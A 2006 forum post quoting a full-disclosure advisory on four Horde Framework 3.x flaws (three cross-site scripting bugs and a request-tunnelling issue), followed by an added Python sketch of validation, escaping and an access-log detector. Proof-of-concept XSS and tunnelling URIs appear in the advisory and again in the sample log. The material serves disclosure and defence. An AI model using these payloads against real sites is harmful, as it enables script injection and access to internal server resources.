
Horde Security Vuln???

Discussion in 'Plesk for Linux - 8.x and Older' started by jwgreene, Jul 5, 2006.

jwgreene (Guest):

    I assume this affects the version packaged with 8.0.1. Hopefully they will release the patched version shortly.

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1



    SA0011

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++ Horde 3.1.1, 3.0.10 Multiple Security Issues +++++
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


    PUBLISHED ON
    July 05, 2006


    PUBLISHED AT
    http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
    http://moritz-naumann.com/adv/0011/hordemulti/0011.txt.gpg


    PUBLISHED BY
    Moritz Naumann IT Consulting & Services
    Hamburg, Germany
    http://moritz-naumann.com/

    SECURITY at MORITZ hyphen NAUMANN d0t COM
    GPG key: http://moritz-naumann.com/keys/0x277F060C.asc


    AFFECTED APPLICATION OR SERVICE
    Horde Application Framework
    http://www.horde.org

    The Horde Framework is a common code-base used by Horde
    applications, including libraries and a common user interface.
    The best known Horde application to date is probably IMP, a web-based
    IMAP/SMTP client.


    AFFECTED VERSIONS
    Version 3.0.0 up to and including 3.0.10
    Version 3.1.0 up to and including 3.1.1
    Versions below 3.0.0 have not been examined.


    ISSUES
    Horde is subject to multiple security vulnerabilities, ranging from
    information disclosure to client side script injection (cross site
    scripting) issues.

    +++++ 1. Cross Site Scripting #1
    Horde is subject to a client side script injection vulnerability in
    the URL redirection (dereferrer) function.

    By accessing the following (partial) URI on a web site running an
    affected version with a web browser which is prone to this issue,
    client side script code will be injected into the output generated
    by the application:

    [Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);

    This problem is caused by insufficient validation of user supplied
    input. It is only known to be exploitable on Internet Explorer 6
    (tested on v6.2900.2180 including all patches on Windows XP SP2).
    Internet Explorer 7 beta 3 is not affected.

    +++++ 2. Cross Site Scripting #2
    Horde is subject to a client side script injection vulnerability in
    the help function.

    By accessing the following (partial) URI on a web site running a
    vulnerable version with a web browser which is prone to this issue,
    client side script code will be injected into the output generated
    by the application:


    [Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E

    This problem is caused by insufficient validation of user supplied
    input. All common modern browsers providing Javascript support are
    assumed to be prone to this issue.

    +++++ 3. Cross Site Scripting #3
    Horde is subject to a client side script injection
    vulnerability in the problem reporting function.

    By accessing the following (partial) URI on a web site running a
    vulnerable version with a web browser which is prone to this issue,
    client side script code will be injected into the output generated
    by the application:


    [Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22

    This problem is caused by insufficient validation of user supplied
    input. All common modern browsers providing Javascript support are
    assumed to be prone to this issue.

    +++++ 4. Cross Site Scripting #4, Web tunneling behaviour
    Horde is subject to a server side issue which allows tunnelling HTTP
    GET requests through the application and injecting remotely hosted
    web script into the output generated by the application.

    This behaviour allows for accessing arbitrary locations which are
    addressable using URIs starting with 'http://','https://' or
    'ftp://' protocol handlers. These locations will be accessible from
    within the security context of the web server running an affected
    version of the application. As a result, an attacker may be able to
    access remote locations s/he would not otherwise have access to,
    without disclosing the real source of the request [1]. Additionally,
    insufficiently access-restricted local (server-side) or remote (3rd
    party) locations may become available [2].

    By tricking a victim into starting a tunnelling call to a previously
    prepared malicious HTML file, stored in a remote location, which
    contains web script which may be executed on the client side, it is
    possible to extend this into a script injection issue. The injected
    script would be executed by the client within the context of the
    domain the vulnerable web application is hosted in. [3] All common
    modern browsers providing Javascript support are assumed to be prone
    to this issue.

    By accessing the following (partial) URIs on a web site running a
    vulnerable version with a web browser, the behaviours described
    above may be triggered:

    [1]
    [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
    [2]
    [Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status
    [3]
    [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html


    BACKGROUND
    Cross Site Scripting (XSS):
    Cross Site Scripting, also known as XSS or CSS, describes
    the injection of malicious content into output produced
    by a web application. A common attack vector is the
    inclusion of arbitrary client side script code into the
    application's output. Failure to completely sanitize user
    input from malicious content can cause a web application
    to be vulnerable to Cross Site Scripting.

    http://www.owasp.org/index.php/Cross_Site_Scripting
    http://en.wikipedia.org/wiki/XSS
    http://www.cgisecurity.net/articles/xss-faq.shtml


    WORKAROUNDS
    Issues 1-3:
    Client: Disable Javascript.
    Server: Prevent access to vulnerable file(s).
    Issue 4:
    Client: Use application as intended only.
    Server: Prevent access to vulnerable file(s).


    SOLUTIONS
    The Horde project has released versions 3.1.2 and 3.0.11 today.
    These are supposed to fix all of the above issues. The updated
    packages are available at http://horde.org/


    TIMELINE
    Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification
    Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement
    Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly
    Jul 05, 2006 Issues 1-4: Public advisory


    NOTES
    This is not related to CVE-2006-2195.


    REFERENCES
    Developers' release announcements
    v3.1.2: http://lists.horde.org/archives/announce/2006/000288.html
    v3.0.11: http://lists.horde.org/archives/announce/2006/000287.html


    ADDITIONAL CREDIT
    N/A


    LICENSE
    Creative Commons Attribution-ShareAlike License Germany
    http://creativecommons.org/licenses/by-sa/2.0/de/

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.3 (GNU/Linux)

    iD8DBQFErDKBn6GkvSd/BgwRAlF7AJ4kjEsFBc2LXp4TgtxQ82OyUK4nBACfZy/U
    31jDwhWrNKdtHXmsdcM1bAk=
    =ENdh
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
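Added example, not part of the forum post, the advisory, or Horde's own code: a Python sketch of the input checks the four advisory issues call for (scheme and host validation for the go.php dereferrer, context-correct HTML escaping for the reflected help and problem.php parameters) and a small access-log scan that flags requests shaped like the advisory's probe URIs. All function names, the hostname regex and the log lines are constructed for illustration; reading `untrusted=1` as the marker of the server-side fetch is an inference from the advisory's issue-4 URIs only, not something verified against the Horde source.

```python
"""Added example (not Horde's code): checks for the issue classes in advisory SA0011.

Constructed for illustration: every name below, the hostname regex, the sample
log lines, and the reading that 'untrusted=1' marks go.php's server-side fetch
(inferred from the advisory's issue-4 URIs, not verified against Horde).
"""
import html
import ipaddress
import re
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https", "ftp"}   # handlers the advisory says go.php forwards
HOSTNAME_RE = re.compile(
    r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*", re.I)


def is_safe_target(url: str) -> bool:
    """Accept only absolute http/https/ftp URLs with a sane, non-local host.

    Rejects the issue-1 payload (javascript: scheme, ';' in the URL, host '.')
    and the issue-4 [2] payload (localhost). Literal IPv6 hosts are rejected as
    well, the conservative choice for a redirector. If the target is fetched
    server-side instead of redirected to, also resolve the name and check every
    resulting address: a public hostname can resolve to a private one.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if any(ch in url for ch in ";\r\n\t "):        # 'http://./;URL=javascript:' style tricks
        return False
    host = parts.hostname or ""
    if not HOSTNAME_RE.fullmatch(host):
        return False
    try:
        return ipaddress.ip_address(host).is_global  # 127/8, 10/8, 169.254/16 ... refused
    except ValueError:                               # not a literal IP: a hostname
        low = host.lower()
        return low != "localhost" and not low.endswith(".localhost")


def render_help_module(module: str) -> str:
    """Issue 2: the module name lands in element content; escape < > & and quotes."""
    return "<h1>Help: %s</h1>" % html.escape(module, quote=True)


def render_problem_name(name: str) -> str:
    """Issue 3: the name lands inside a double-quoted attribute, so the quote
    character must be escaped or the payload closes the attribute and the tag."""
    return '<input type="text" name="name" value="%s">' % html.escape(name, quote=True)


# --- access-log scan (Apache combined format) --------------------------------
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def query_params(query: str) -> dict:
    """Split a query string on '&' only; the issue-1 payload contains ';' in its value."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def find_suspicious_requests(lines):
    """Return (client, reason, decoded value) for requests matching the advisory's patterns."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group("ip"), urlsplit(m.group("target"))
        params = query_params(target.query)
        if target.path.endswith("/services/go.php"):
            tunnel = params.get("untrusted") == ["1"]   # assumed server-side fetch marker
            for url in params.get("url", []):
                if tunnel:
                    hits.append((ip, "go.php tunnel", url))
                elif not is_safe_target(url):
                    hits.append((ip, "go.php redirect", url))
        elif "/services/help" in target.path:
            for value in params.get("module", []):
                if "<" in value:
                    hits.append((ip, "help module", value))
        elif target.path.endswith("/services/problem.php"):
            for value in params.get("name", []):
                if any(ch in value for ch in '<>"'):
                    hits.append((ip, "problem.php name", value))
    return hits


# Constructed sample log using documentation-range addresses; not a real capture.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2006:10:00:00 +0200] "GET /horde/services/go.php?url=http://./;URL=javascript:alert(0); HTTP/1.1" 302 0',
    '203.0.113.5 - - [05/Jul/2006:10:00:01 +0200] "GET /horde/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [05/Jul/2006:10:00:02 +0200] "GET /horde/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22 HTTP/1.1" 200 1024',
    '203.0.113.5 - - [05/Jul/2006:10:00:03 +0200] "GET /horde/services/go.php?untrusted=1&url=http://localhost/server-status HTTP/1.1" 200 4096',
    '198.51.100.7 - - [05/Jul/2006:10:00:04 +0200] "GET /horde/services/go.php?url=http://www.example.com/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [05/Jul/2006:10:00:05 +0200] "GET /horde/imp/login.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Run against the constructed log, the scan reports the four probe requests from 203.0.113.5 and nothing for the legitimate redirect or the login page. The log scan is a detection aid for the vulnerable versions, not a replacement for upgrading to 3.1.2 / 3.0.11: `go.php` with a server-side fetch needs the resolved-address check described in the `is_safe_target` docstring, which a log-only heuristic cannot do.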